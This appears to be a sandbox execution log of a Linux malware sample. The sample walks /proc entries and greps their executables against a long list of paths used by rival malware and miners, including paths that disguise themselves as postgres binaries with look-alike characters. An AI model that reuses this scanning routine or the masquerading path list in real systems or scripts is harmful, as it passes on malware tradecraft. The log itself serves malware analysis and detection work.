/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1076
-
-
/bin/grepgrep exe2⤵PID:1080
-
-
/bin/lsls -latrh /proc/7332⤵PID:1079
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1082
-
-
/bin/grepgrep exe2⤵PID:1086
-
-
/bin/lsls -latrh /proc/7342⤵PID:1085
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1089
-
-
/bin/lsls -latrh /proc/7362⤵PID:1091
-
-
/bin/grepgrep exe2⤵PID:1092
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1096
-
-
/bin/grepgrep exe2⤵PID:1100
-
-
/bin/lsls -latrh /proc/742⤵PID:1099
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1103
-
-
/bin/grepgrep exe2⤵PID:1106
-
-
/bin/lsls -latrh /proc/7422⤵PID:1105
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1108
-
-
/bin/grepgrep exe2⤵PID:1111
-
-
/bin/lsls -latrh /proc/7482⤵PID:1110
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1113
-
-
/bin/grepgrep exe2⤵PID:1119
-
-
/bin/lsls -latrh /proc/752⤵PID:1118
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1122
-
-
/bin/lsls -latrh /proc/7542⤵PID:1124
-
-
/bin/grepgrep exe2⤵PID:1125
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1127
-
-
/bin/grepgrep exe2⤵PID:1130
-
-
/bin/lsls -latrh /proc/762⤵PID:1129
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1132
-
-
/bin/grepgrep exe2⤵PID:1135
-
-
/bin/lsls -latrh /proc/772⤵PID:1134
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1137
-
-
/bin/grepgrep exe2⤵PID:1140
-
-
/bin/lsls -latrh /proc/782⤵PID:1139
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1142
-
-
/bin/grepgrep exe2⤵PID:1145
-
-
/bin/lsls -latrh /proc/82⤵PID:1144
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1147
-
-
/bin/grepgrep exe2⤵PID:1150
-
-
/bin/lsls -latrh /proc/812⤵PID:1149
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1152
-
-
/bin/grepgrep exe2⤵PID:1155
-
-
/bin/lsls -latrh /proc/822⤵PID:1154
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1157
-
-
/bin/grepgrep exe2⤵PID:1160
-
-
/bin/lsls -latrh /proc/92⤵PID:1159
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1162
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1164
-
-
/bin/grepgrep exe2⤵PID:1165
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1167
-
-
/bin/grepgrep exe2⤵PID:1170
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1169
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1172
-
-
/bin/grepgrep exe2⤵PID:1175
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1174
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1177
-
-
/bin/grepgrep exe2⤵PID:1180
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1179
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1182
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1184
-
-
/bin/grepgrep exe2⤵PID:1185
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1187
-
-
/bin/grepgrep exe2⤵PID:1190
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1189
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1192
-
-
/bin/grepgrep exe2⤵PID:1195
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1194
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1197
-
-
/bin/grepgrep exe2⤵PID:1200
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1199
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1202
-
-
/bin/grepgrep exe2⤵PID:1205
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1204
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1207
-
-
/bin/grepgrep exe2⤵PID:1210
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1209
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1212
-
-
/bin/grepgrep exe2⤵PID:1215
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1214
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1217
-
-
/bin/grepgrep exe2⤵PID:1220
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1219
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1222
-
-
/bin/grepgrep exe2⤵PID:1225
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1224
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1227
-
-
/bin/grepgrep exe2⤵PID:1230
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1229
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1232
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1234
-
-
/bin/grepgrep exe2⤵PID:1235
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1237
-
-
/bin/grepgrep exe2⤵PID:1240
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1239
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1242
-
-
/bin/grepgrep exe2⤵PID:1245
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1244
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1247
-
-
/bin/grepgrep exe2⤵PID:1250
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1249
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1252
-
-
/bin/grepgrep exe2⤵PID:1255
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1254
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1257
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1260
-
-
/bin/grepgrep exe2⤵PID:1261
-
-
